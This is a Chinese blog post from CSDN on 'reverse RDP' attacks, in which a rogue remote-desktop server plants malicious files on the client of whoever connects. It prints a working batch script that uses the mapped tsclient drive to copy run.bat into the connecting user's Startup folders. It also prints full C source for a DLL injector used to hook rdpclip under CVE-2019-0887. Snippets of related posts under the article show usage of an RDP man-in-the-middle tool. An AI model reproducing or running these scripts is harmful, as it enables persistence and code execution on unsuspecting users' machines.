开启rdp_RDP反向攻击

最新推荐文章于 2023-08-24 22:15:23 发布
最新推荐文章于 2023-08-24 22:15:23 发布
阅读量990 收藏 1
点赞数
文章标签: 开启rdp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_26757949/article/details/112636231
版权

RDP反向攻击

介绍

这里讲两种攻击方式:

  • 利用挂载盘符进行攻击

  • 利用CVE-2019-0887进行攻击

两者都是在攻击的登录远程桌面时,向攻击者PC的启动目录写入恶意文件,需要重启才能运行恶意文件。
我这里测试的时候,存在很多问题,尤其是后者,较不稳定,按照严格意义并没有复现成功,也许是操作系统问题,也许是代码问题。

利用挂载盘符

原理是通过访问tsclient,并通过目录遍历找到启动目录,将恶意文件写入其中。
tsclient是通过远程桌面连接到远程计算机时,自动分配的一个主机名。
利用该方式的前提是需要开启挂载盘符。

4f9a3b1a02087aeea7544ac8766f2c74.png

当开启后,在被登录服务器端执行命令:
dir \tsclient\c
但是要执行其他命令就会拒绝访问。8d28cbf2fb11ed0a51f0f6ffc1ea7998.png这里给出一个bat脚本,运行后就可以自动对登录PC的启动项进行写入。65de4ff4f866ce2ed0fd1c7cb644352b.png

@echo off

timeout 1 >nul 2>&1

mkdir \\tsclient\c\temp >nul 2>&1

mkdir C:\temp >nul 2>&1

copy run.bat C:\temp >nul 2>&1

copy run.bat \\tsclient\c\temp >nul 2>&1

del /q %TEMP%\temp_00.txt >nul 2>&1

set dirs=dir /a:d /b /s \\tsclient\c\users\*startup*

echo|%dirs%|findstr /i "Microsoft\Windows\Start Menu\Programs\Startup">>"%TEMP%\temp_00.txt"

for /F "tokens=*" %%a in (%TEMP%\temp_00.txt) DO (

copy run.bat "%%a" >nul 2>&1

copy C:\temp\run.bat "%%a" >nul 2>&1

copy \\tsclient\c\temp\run.bat "%%a" >nul 2>&1

)

del /q %TEMP%\temp_00.txt >nul 2>&1

测试中第一次没成功,好像是权限问题,拒绝访问。4085d8f8909148faa78673907644e9da.png换了个环境测试,成功写入。3a417737cf3de6163ab727f9dd5610e8.png

利用CVE-2019-0887进行攻击

原理这里不做进一步讲解,可以参考文章2.这里只做简单说明,向rdpclip进程中注入dll,hook几个关键函数,对Hdrop数据进行修改,在客户端复制的时候触发,同时粘贴多个文件,路径可自定义(我没成功)。在触发成功时,可以看到ClipSpy中FileGroupDescriptorW中包含了两个文件名。

上面的是真实复制的文件。

1116c77f0b2384025e0a5fe112016edd.png

下面的是hook后增加的恶意文件,我这里没有成功,只能同时复制到桌面,没有能复制到启动目录(我改了代码),原始的代码编译的dll,一触发粘贴,甚至刚复制完,rdpclip进程就崩溃了。

54e11c5a1dac69b625e2419870f49a90.png

粘贴后桌面出现两个文件

e643e7d03638c1e70f3d74a455a1f7f5.png

测试中,就在win7上成功过,其他的都有问题,就在win7上也时常出现崩溃的问题,没有好的办法解决。贴下注入的代码,参考3gstudent的代码。

#include

#include

#include

#include

#pragma comment(lib,"Advapi32.lib")

typedef NTSTATUS(NTAPI* pfnNtCreateThreadEx)

(

OUT PHANDLE hThread,

IN ACCESS_MASK DesiredAccess,

IN PVOID ObjectAttributes,

IN HANDLE ProcessHandle,

IN PVOID lpStartAddress,

IN PVOID lpParameter,

IN ULONG Flags,

IN SIZE_T StackZeroBits,

IN SIZE_T SizeOfStackCommit,

IN SIZE_T SizeOfStackReserve,

OUT PVOID lpBytesBuffer);

#define NT_SUCCESS(x) ((x) >= 0)

typedef struct _LSA_UNICODE_STRING {

USHORT Length;

USHORT MaximumLength;

PWSTR Buffer;

} LSA_UNICODE_STRING, *PLSA_UNICODE_STRING, UNICODE_STRING, *PUNICODE_STRING;

typedef NTSTATUS(NTAPI *pRtlInitUnicodeString)(PUNICODE_STRING, PCWSTR);

typedef NTSTATUS(NTAPI *pLdrLoadDll)(PWCHAR, ULONG, PUNICODE_STRING, PHANDLE);

typedef DWORD64(WINAPI *_NtCreateThreadEx64)(PHANDLE ThreadHandle, ACCESS_MASK DesiredAccess, LPVOID ObjectAttributes, HANDLE ProcessHandle, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, BOOL CreateSuspended, DWORD64 dwStackSize, DWORD64 dw1, DWORD64 dw2, LPVOID Unknown);

typedef struct _THREAD_DATA

{

pRtlInitUnicodeString fnRtlInitUnicodeString;

pLdrLoadDll fnLdrLoadDll;

UNICODE_STRING UnicodeString;

WCHAR DllName[260];

PWCHAR DllPath;

ULONG Flags;

HANDLE ModuleHandle;

}THREAD_DATA, *PTHREAD_DATA;

HANDLE WINAPI ThreadProc(PTHREAD_DATA data)

{

data->fnRtlInitUnicodeString(&data->UnicodeString, data->DllName);

data->fnLdrLoadDll(data->DllPath, data->Flags, &data->UnicodeString, &data->ModuleHandle);

return data->ModuleHandle;

}

DWORD WINAPI ThreadProcEnd()

{

return 0;

}

HANDLE MyCreateRemoteThread(HANDLE hProcess, LPTHREAD_START_ROUTINE pThreadProc, LPVOID pRemoteBuf)

{

HANDLE hThread = NULL;

FARPROC pFunc = NULL;

pFunc = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtCreateThreadEx");

if (pFunc == NULL)

{

printf("[!]GetProcAddress (\"NtCreateThreadEx\")error\n");

return NULL;

}

((_NtCreateThreadEx64)pFunc)(&hThread, 0x1FFFFF, NULL, hProcess, pThreadProc, pRemoteBuf, FALSE, NULL, NULL, NULL, NULL);

if (hThread == NULL)

{

printf("[!]MyCreateRemoteThread : NtCreateThreadEx error\n");

return NULL;

}

if (WAIT_FAILED == WaitForSingleObject(hThread, INFINITE))

{

printf("[!]MyCreateRemoteThread : WaitForSingleObject error\n");

return NULL;

}

return hThread;

}

BOOL InjectDll(UINT32 ProcessId, char *DllPath)

{

if (strstr(DllPath, "\\\\") != 0)

{

printf("[!]Wrong Dll path\n");

return FALSE;

}

if (strstr(DllPath, "\\") == 0)

{

printf("[!]Need Dll full path\n");

return FALSE;

}

size_t len = strlen(DllPath) + 1;

size_t converted = 0;

wchar_t* DllFullPath;

DllFullPath = (wchar_t*)malloc(len * sizeof(wchar_t));

mbstowcs_s(&converted, DllFullPath, len, DllPath, _TRUNCATE);

LPVOID pThreadData = NULL;

LPVOID pCode = NULL;

HANDLE ProcessHandle = NULL;

HANDLE hThread = NULL;

BOOL bRet = FALSE;

__try

{

ProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessId);

if (ProcessHandle == NULL)

{

printf("[!]OpenProcess error\n");

__leave;

}

THREAD_DATA data;

HMODULE hNtdll = GetModuleHandleW(L"ntdll.dll");

data.fnRtlInitUnicodeString = (pRtlInitUnicodeString)GetProcAddress(hNtdll, "RtlInitUnicodeString");

data.fnLdrLoadDll = (pLdrLoadDll)GetProcAddress(hNtdll, "LdrLoadDll");

memcpy(data.DllName, DllFullPath, (wcslen(DllFullPath) + 1) * sizeof(WCHAR));

data.DllPath = NULL;

data.Flags = 0;

data.ModuleHandle = INVALID_HANDLE_VALUE;

pThreadData = VirtualAllocEx(ProcessHandle, NULL, 4096, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

if (pThreadData == NULL)

{

CloseHandle(ProcessHandle);

printf("[!]VirtualAllocEx error\n");

__leave;

}

BOOL bWriteOK = WriteProcessMemory(ProcessHandle, pThreadData, &data, sizeof(data), NULL);

if (!bWriteOK)

{

CloseHandle(ProcessHandle);

printf("[!]WriteProcessMemory error\n");

__leave;

}

DWORD SizeOfCode = (DWORD)ThreadProcEnd - (DWORD)ThreadProc;

pCode = VirtualAllocEx(ProcessHandle, NULL, SizeOfCode, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

if (pCode == NULL)

{

CloseHandle(ProcessHandle);

printf("[!]VirtualAllocEx error,%d\n", GetLastError());

__leave;

}

bWriteOK = WriteProcessMemory(ProcessHandle, pCode, (PVOID)ThreadProc, SizeOfCode, NULL);

if (!bWriteOK)

{

CloseHandle(ProcessHandle);

printf("[!]WriteProcessMemory error\n");

__leave;

}

hThread = MyCreateRemoteThread(ProcessHandle, (LPTHREAD_START_ROUTINE)pCode, pThreadData);

if (hThread == NULL)

{

CloseHandle(ProcessHandle);

printf("[!]MyCreateRemoteThread error\n");

__leave;

}

WaitForSingleObject(hThread, INFINITE);

bRet = TRUE;

}

__finally

{

if (pThreadData != NULL)

VirtualFreeEx(ProcessHandle, pThreadData, 0, MEM_RELEASE);

if (pCode != NULL)

VirtualFreeEx(ProcessHandle, pCode, 0, MEM_RELEASE);

if (hThread != NULL)

CloseHandle(hThread);

if (ProcessHandle != NULL)

CloseHandle(ProcessHandle);

}

return bRet;

}

BOOL EnableDebugPrivilege(BOOL fEnable)

{

BOOL fOk = FALSE;

HANDLE hToken;

if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))

{

TOKEN_PRIVILEGES tp;

tp.PrivilegeCount = 1;

LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);

tp.Privileges[0].Attributes = fEnable ? SE_PRIVILEGE_ENABLED : 0;

AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);

fOk = (GetLastError() == ERROR_SUCCESS);

CloseHandle(hToken);

}

return(fOk);

}

int main(int argc, char *argv[])

{

if (argc != 3)

{

printf("Use NtCreateThreadEx to inject dll\n\n");

printf("Usage:\n");

printf("%s \n", argv[0]);

return 0;

}

if (!EnableDebugPrivilege(TRUE))

{

printf("[!]AdjustTokenPrivileges Failed.\n", GetLastError());

}

if (!InjectDll((DWORD)atoi(argv[1]), argv[2]))

{

printf("[!]InjectDll error \n");

return 1;

}

printf("[+]InjectDll success\n");

return 0;

}

Usage:

x.exe pid path

或者用我之前的注入代码也可以。
https://github.com/hmoytx/RdpThief_tools/blob/master/use/detourstest.cpp
自己修改对应进程名和路径即可。

参考

https://mp.weixin.qq.com/s/Aog7M_6XauRi96wFeRo6sg https://paper.seebug.org/1074/

https://paper.seebug.org/1074/

jiyulishang
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
RDP中间人攻击
帅醉了的博客
10-04 900
前言:靠着网上的资源一点一点的啃。 内网渗透中,发觉有机器开了远程桌面,可以使用RDP中间人攻击进行持久控制和横向渗透。 攻击成功具备的条件 同一个网段 知道连接者ip,被连接ip。 工具:Seth git clone https://github.com/SySS-Research/Seth.git 使用方法 ./seth.sh <INTERFACE> <ATTACKER_IP> <VICTIM_IP> <GATEWAY_IP|HOST_IP> [&
RDP远程访问(远程桌面)的FRPC端设置,配合FRPS服务
11-07
远程桌面协议(RDP,Remote Desktop Protocol)是微软...总之,RDP远程访问通过FRPC和FRPS的配合,可以实现安全的反向代理,有效保护内网RDP服务器免受直接攻击。同时,合理的配置和管理可以进一步提高系统的安全性。
基于文件传输的RDP反向攻击
chaojixiaojingang
08-06 1639
1.简述 RDP反向攻击的姿势有不少,本次是通过挂载盘符进行 RDP 反向攻击。其基本原理就是Windows 远程桌面客户端 mstsc 有一个盘符挂载选项,如果勾选了该选项,会开启磁盘共享功能,相当于将你的磁盘在远程主机上共享,你可以通过类似于 SMB 文件传输命令那样将位于远程主机上的文件复制到客户端主机上。如果我们通过相应的设置,在客户端连接远程主机的一瞬间,将远程主机上早已准备好的木马程序复制到客户端主机的启动项中,那么当客户端主机下一次启动时便会执行该木程序,客户端主机便可以成功...
rdp反向攻击利用总结
weixin_44747030的博客
11-19 795
rdp反向攻击
RDP攻击
weixin_42584507的博客
01-12 304
RDP (Remote Desktop Protocol) 攻击是指通过利用 RDP 协议中的漏洞来进行的网络攻击RDP 是一种远程桌面协议,可以让用户在远程计算机上运行应用程序和控制远程计算机。由于 RDP 是一种开放的协议,因此它可能存在漏洞,可能被黑客利用来进行攻击。这类攻击的目的通常是控制远程计算机或窃取敏感信息。 ...
rdp协议服务器会反连客户端吗,反向RDP攻击RDP客户端上的代码执行
weixin_39542850的博客
08-10 995
一、概述远程桌面协议(RDP)被全球数以千计的IT专业人员和安全研究人员使用,它通常被认为是连接到远程计算机的安全可靠的应用程序。无论是用于帮助远程工作人员还是在安全的VM环境中工作,RDP客户端都是非常宝贵的工具。但是,Check Point Research最近在常用的远程桌面协议(RDP)中发现了多个严重漏洞,这些漏洞允许恶意行为者反向通常的通信方向并感染IT专业人员或安全研究的计算机。 这...
cloudconnect:云感知客户端连接ssh,sftp和rdp
05-02
创建一个正向和反向隧道 与他人安全共享应用程序,而无需共享真实实例的任何连接详细信息 安全的工作区,具有强大的加密功能 安装 从dist文件夹安装,包含Windows构建 或者 git clone ...
mstsc-3389-rdp文件中密码的生成
03-03
2. **编辑RDP文件**:.RDP文件本质上是文本文件,可以用记事本或其他文本编辑器打开。在文件的末尾添加特定的指令行来设置用户名和密码。 - `username:s:` 后面跟的是你要登录的用户名。 - `password 51:b:` 后面...
Fenrir:PoC 通过 RDP 虚拟通道隧道传输 Meterpreter 反向 HTTP shell
06-23
芬里尔由 NCC Group Plc 作为开源发布 - 由 Dave Spencer 开发,david [dot] spencer [at] nccgroup [dot] com 在 AGPL 下发布,请参阅许可证以获取更多信息描述Fenrir 的创建是为了证明可以通过 RDP 虚拟通道对网络...
win_autossh_svc:cygwin + nssm + batch文件结合在一起,提供了一个有弹性的反向rdp隧道
05-13
win_autossh_svc 这将安装Windows服务,该服务利用Cygwin的autossh维护到“远程”计算机上端口的反向隧道。 当前配置将隧道指向目标计算机上的3389,并使其在本地计算机上的33890可用。 一些条款: LOCALMACHINE:您...
rdpsign:远程桌面协议(.rdp)文件签名
05-13
该python脚本是对rdpsign.exe内部进行反向工程的结果。安装sudo curl https://raw.githubusercontent.com/nfedera/rdpsign/master/rdpsign.py -o /usr/local/bin/rdpsignsudo chmod a+rx /usr/local/bin/rdpsign...
reverse-rdp-windows-github-actions:在GitHub Actions上将远程桌面反转为Windows
05-08
在GitHub Actions上将... 等待直到最后一步,因为它连接到ngrok并建立反向隧道,该步骤将永远挂起。 访问ngrok的仪表板。 注意活动隧道的公共主机和端口。 使用您选择的RDP客户端连接到主机和端口组合。 使用用户名ru
PortFusion:Haskell支持的跨平台传输层分布式反向转发代理和隧道解决方案–当前可用于所有TCP协议(RDP,VNC,HTTP(S),SSH等)
02-04
PortFusion:Haskell支持的跨平台传输层分布式反向转发代理和隧道解决方案–当前可用于所有TCP协议(RDP,VNC,HTTP(S),SSH等)
workfromhome-with-docker:使用Apache Guacamole和Traefik反向代理的基于HTML5的远程桌面网关,包括AD身份验证和2-FA
05-28
用作反向代理,负责自动请求和更新Letsencrypt证书以进行SSL终止并保护网络流量。 HTTPS请求被代理到Apache Guacamole中。 是无客户端远程桌面网关,它支持RDP,VNC和SSH等协议。 由于Guacamole客户端是HTML5 Web...
2014版御剑下载
11-12
这有助于识别可能的攻击入口点。 3. **指纹探测**:指纹探测技术用于识别目标系统的具体类型、版本和配置,这在漏洞利用和安全审计中至关重要。通过发送特定的请求并分析响应,工具可以匹配已知的服务特征,确定...
RDPInception攻击手法
谢公子的博客
04-28 2423
在讲RDPInception攻击手段之前,我们先了解一下RDP远程桌面(Remote Desktop Protocol)协议。RDP远程桌面协议(Remote Desktop Protocol)是一个多通道(multi-channel)的协议,让网站管理员通过网络连接远程操控服务器。RDP协议默认使用的端口是 3389。 由于RDPInception攻击要求的条件比较苛刻,在现实生产环境中几乎不...
鸡肋的RDP反制
crowsec
08-24 381
在很多攻防中,蓝队想要根据一台公网的RDP服务器或者Windows蜜罐服务器,获取攻击者本身的真实pc,可以尝试使用RDP反制来操作,本文以此为背景,进行学习记录。
内网安全:横向传递攻击RDP || Cobalt Strike )
网络安全领域___专研者.
06-11 2429
横向移动就是在拿下对方一台主机后,以拿下的那台主机作为跳板,对内网的其他主机再进行后面渗透,利用既有的资源尝试获取更多的凭据、更高的权限,一步一步拿下更多的主机,进而达到控制整个内网、获取到最高权限、发动高级持续性威胁攻击的目的.(传递攻击主要建立在明文和Hash值获取基础上进行攻击.)
rdp连接工具_通过反向 SSH 隧道连接 RDP
weixin_39783149的博客
11-27 1244
本文作者:hl0rey(信安之路作者团队成员 & 信安之路红蓝对抗小组组长)成员招募:信安之路红蓝对抗小组招募志同道合的朋友这是这个系列最后一篇了,想要看更多内容请大家移步到原网站查看吧,这个系列的翻译可能会存在问题,希望大家可以理解,在实践中遇到问题欢迎与我们交流,有对红蓝对抗感兴趣的同学欢迎联系组长加入组织。22检测发现设置为密码永不过期的用户通常来说我们会把一个服务账户的...
xrdp_rdp_recv: xrdp_channel...iled
最新发布
05-27
xrdp_rdp_recv是xrdp项目中的一个函数,其作用是接收远程桌面连接中的数据包。xrdp_channel是xrdp项目中与通道有关的结构体。xrdp_rdp_recv函数在接收数据包时可能会出现通道接收失败的情况,此时会返回xrdp_channel_recv_error错误代码。出现这种情况可能是由于网络连接问题或其他原因导致的。 如果你需要更详细的信息,可以提供更多上下文或具体问题,我会尽力帮助你解决问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值